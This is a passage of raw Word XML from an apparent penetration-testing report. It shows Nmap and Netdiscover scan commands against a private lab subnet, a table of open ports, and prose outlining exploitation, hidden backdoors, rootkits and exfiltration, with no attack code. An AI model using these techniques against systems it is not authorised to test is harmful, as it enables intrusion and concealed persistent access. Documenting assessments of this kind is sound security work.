          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6555A473" w14:textId="1BF97119" w:rsidR="00BF41FA" w:rsidRPr="00C7315C" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>To discover active hosts without port scanning, this software does a ping scan (-sn) on the specified target IP range.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t>Screen</w:t>
      </w:r>
      <w:r w:rsidR="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>shot</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BF41FA" w:rsidRPr="006563CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F4A8377" wp14:editId="18A24E2A">
            <wp:extent cx="5210902" cy="1971950"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="85069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98539" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5210902" cy="1971950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Netdiscover:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> A program for discovering network addresses that </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to locate hosts that are currently online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39437A5A" w14:textId="6CB9A802" w:rsidR="00BF41FA" w:rsidRPr="00BF41FA" w:rsidRDefault="00BF41FA" w:rsidP="00040110">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7315C">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo netdiscover -i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>eth1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A162EE" w14:textId="21B1B397" w:rsidR="00997E39" w:rsidRPr="00BF41FA" w:rsidRDefault="00997E39" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t>Explanation: To find active hosts on the network, this program uses Netdiscover to perform network discovery on the specified interface (-i).</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
        <w:t>Screenshot:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BF41FA" w:rsidRPr="006563CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="113638B9" wp14:editId="23992C33">
            <wp:extent cx="5943600" cy="1809115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="35191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13534" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1809115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70D6CF" w14:textId="77777777" w:rsidR="00997E39" w:rsidRDefault="00997E39" w:rsidP="00040110"/>
    <w:p w14:paraId="03B6D49D" w14:textId="77777777" w:rsidR="00963529" w:rsidRDefault="00963529" w:rsidP="00040110"/>
    <w:p w14:paraId="3610F853" w14:textId="77777777" w:rsidR="00BF41FA" w:rsidRDefault="00BF41FA" w:rsidP="00040110"/>
    <w:p w14:paraId="44D68D8B" w14:textId="77777777" w:rsidR="00C7315C" w:rsidRDefault="00C7315C" w:rsidP="00040110"/>
    <w:p w14:paraId="5C7FCCD4" w14:textId="77777777" w:rsidR="00BF41FA" w:rsidRDefault="00BF41FA" w:rsidP="00040110"/>
    <w:p w14:paraId="180748A1" w14:textId="77777777" w:rsidR="00963529" w:rsidRPr="0034765E" w:rsidRDefault="00963529" w:rsidP="00040110"/>
    <w:p w14:paraId="419BA70C" w14:textId="5416EB87" w:rsidR="008757F4" w:rsidRPr="00BF41FA" w:rsidRDefault="00BF41FA" w:rsidP="00040110">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BF41FA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR" w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2 Service Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF41FA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008757F4" w:rsidRPr="008757F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:br/>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I concentrated on locating and gathering comprehensive data on the services running on the target hosts during the Service Enumeration portion of the Network Penetration Testing Assessment. An understanding of the types, versions, configurations, and potential vulnerabilities present in the network environment is provided by service enumeration. </w:t>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008757F4"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Important Tasks:</w:t>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w:t>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008757F4"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1. Port Scanning:</w:t>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To identify open ports on the target servers, I performed port scans using programs like Nmap and Masscan. Active network services that are accessible and potentially vulnerable to misuse are represented by open ports. </w:t>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008757F4"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2. Service Version Detection:</w:t>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Following the discovery of open ports, I used service version detection to identify the specific programs and versions that were using each port. This data facilitates targeted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exploitation</w:t>
      </w:r>
      <w:r w:rsidR="008757F4"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activities and aids in the discovery of known vulnerabilities associated with certain software versions.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667"/>
        <w:gridCol w:w="4673"/>
      </w:tblGrid>
      <w:tr w:rsidR="008757F4" w14:paraId="1D352955" w14:textId="77777777" w:rsidTr="008F32E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="0B6441D7" w14:textId="77777777" w:rsidR="008757F4" w:rsidRPr="003D4872" w:rsidRDefault="008757F4" w:rsidP="00040110">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D4872">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Server IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="203E9DB7" w14:textId="77777777" w:rsidR="008757F4" w:rsidRPr="003D4872" w:rsidRDefault="008757F4" w:rsidP="00040110">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D4872">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Ports Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008757F4" w14:paraId="3EA30166" w14:textId="77777777" w:rsidTr="008F32E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B7F7008" w14:textId="77777777" w:rsidR="008757F4" w:rsidRPr="003D4872" w:rsidRDefault="008757F4" w:rsidP="00040110">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D4872">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>2.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02F9A7B2" w14:textId="77777777" w:rsidR="008757F4" w:rsidRDefault="008757F4" w:rsidP="00040110">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D4872">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 21,22,25,80,443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008757F4" w14:paraId="256E513E" w14:textId="77777777" w:rsidTr="008F32E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E798691" w14:textId="77777777" w:rsidR="008757F4" w:rsidRPr="003D4872" w:rsidRDefault="008757F4" w:rsidP="00040110">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D4872">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>2.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="672C315B" w14:textId="77777777" w:rsidR="008757F4" w:rsidRDefault="008757F4" w:rsidP="00040110">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D4872">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 80, 21, 139, 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008757F4" w14:paraId="2ED910F7" w14:textId="77777777" w:rsidTr="008F32E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="142F818E" w14:textId="77777777" w:rsidR="008757F4" w:rsidRPr="003D4872" w:rsidRDefault="008757F4" w:rsidP="00040110">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D4872">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="4F81BD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D89E9BE" w14:textId="77777777" w:rsidR="008757F4" w:rsidRDefault="008757F4" w:rsidP="00040110">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D4872">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE4428">
              <w:t>3389</w:t>
            </w:r>
            <w:r>
              <w:t>, 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="796E94B0" w14:textId="77777777" w:rsidR="008757F4" w:rsidRDefault="008757F4"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6391FDFB" w14:textId="5584440C" w:rsidR="008757F4" w:rsidRDefault="008757F4"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Tools Employed:</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 Nmap:</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A flexible network scanning tool for OS fingerprinting, port scanning, host discovery, and service version identification. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C97FCA" w14:textId="77777777" w:rsidR="008757F4" w:rsidRPr="003C0A92" w:rsidRDefault="008757F4" w:rsidP="00040110">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0A92">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>nmap -sV -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="003C0A92">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>192.168.2.0/24</w:t>
      </w:r>
      <w:r w:rsidRPr="003C0A92">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F093AF4" w14:textId="42406689" w:rsidR="008757F4" w:rsidRPr="008757F4" w:rsidRDefault="008757F4"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t xml:space="preserve">Justification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To</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determine the precise software and versions running on each port, this program performs service version detection (-sV) on the ports (-p) of the destination IP address that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has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been specified.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t>Screen</w:t>
      </w:r>
      <w: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shot</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D0774E" w14:textId="0E34B06B" w:rsidR="00C740D6" w:rsidRDefault="00C740D6" w:rsidP="00040110">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:between w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:bar w:val="none" w:sz="0" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD1CB37" w14:textId="77777777" w:rsidR="00C740D6" w:rsidRDefault="00C740D6" w:rsidP="00040110">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292929" w:themeFill="background2" w:themeFillShade="80"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8100"/>
          <w:tab w:val="left" w:pos="8190"/>
        </w:tabs>
        <w:ind w:left="360" w:right="-450"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C740D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17C3252F" wp14:editId="45D154AC">
            <wp:extent cx="5943600" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="65184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46961" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1724025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="071422F2" w14:textId="76D707F5" w:rsidR="00C740D6" w:rsidRDefault="00C740D6" w:rsidP="00040110">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292929" w:themeFill="background2" w:themeFillShade="80"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8100"/>
          <w:tab w:val="left" w:pos="8190"/>
        </w:tabs>
        <w:ind w:left="360" w:right="-450"/>
      </w:pPr>
      <w:r w:rsidRPr="00C740D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C67D690" wp14:editId="384751B6">
            <wp:extent cx="5943600" cy="4640239"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="68263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37221" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect t="1" b="713"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4640239"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00C740D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC50C02" w14:textId="160EA386" w:rsidR="00DE4428" w:rsidRPr="003C0A92" w:rsidRDefault="00C740D6" w:rsidP="00040110">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C740D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78485465" wp14:editId="1C76382D">
            <wp:extent cx="5977255" cy="387320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="210519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95353" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId12"/>
                    <a:srcRect t="91374"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6015711" cy="389812"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76172DED" w14:textId="0B7E3B67" w:rsidR="00C733A6" w:rsidRDefault="00C733A6" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C733A6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.3 Penetration Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F729F" w14:textId="0EBA59CF" w:rsidR="008757F4" w:rsidRPr="00117B2D" w:rsidRDefault="008757F4"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8757F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>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The Penetration Techniques part of the Network Penetration Testing Assessment comprises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actively</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exploiting discovered vulnerabilities and weaknesses within the network environment to acquire unauthorized access, elevate privileges, and highlight the potential consequences of successful assaults.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Key Activities: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1. Exploitation of Known Vulnerabilities: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Leveraging information acquired during the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reconnaissance</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and enumeration stages, I found and exploited known vulnerabilities existing in the target systems and applications. This includes exploiting publicly available attack code or constructing bespoke exploits to obtain unauthorized access or execute arbitrary instructions on the target computers.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2. Persistence Mechanisms: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To retain access and establish persistence inside the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compromised</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network, I deployed several persistence mechanisms, such as backdoors, rootkits, and scheduled jobs. These measures allow continuing access to the affected systems even after remediation actions have been undertaken by the company.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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">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Post-exploitation</w:t>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 xml:space="preserve"> actions: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Following successful exploitation, I undertook post-exploitation actions to obtain further information, elevate privileges further, and increase my foothold inside the network environment. This may involve reconnaissance, lateral movement, data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exfiltration</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and privilege escalation to fulfill the goals of the penetration testing evaluation.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p>
    <w:p w14:paraId="6DB045C5" w14:textId="0853A219" w:rsidR="00C733A6" w:rsidRPr="00117B2D" w:rsidRDefault="00C733A6" w:rsidP="00040110">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00117B2D">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.4 Maintaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF66E8" w14:textId="1D2AA4F3" w:rsidR="008757F4" w:rsidRPr="008757F4" w:rsidRDefault="008757F4"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t xml:space="preserve">Maintaining access is a vital part of the Network Penetration Testing Assessment since it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involves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gaining permanent control over compromised systems to imitate the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behaviors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of a real-world attacker. By retaining access, I may continue to investigate the network environment, gain new information, and highlight the possible effect of a sustained security breach.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Key Activities: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1. Establishing Backdoors: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After getting initial access to the compromised systems, I install backdoors or persistent access points to enable continuing access even after remediation measures are commenced by the business. These backdoors may take the shape of secret user accounts, malicious scripts, or covert communication channels that enable me to recover access to the systems at a later time.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2. Deploying Rootkits:</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To disguise my existence and elude detection by security controls, I de-</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lastRenderedPageBreak/>
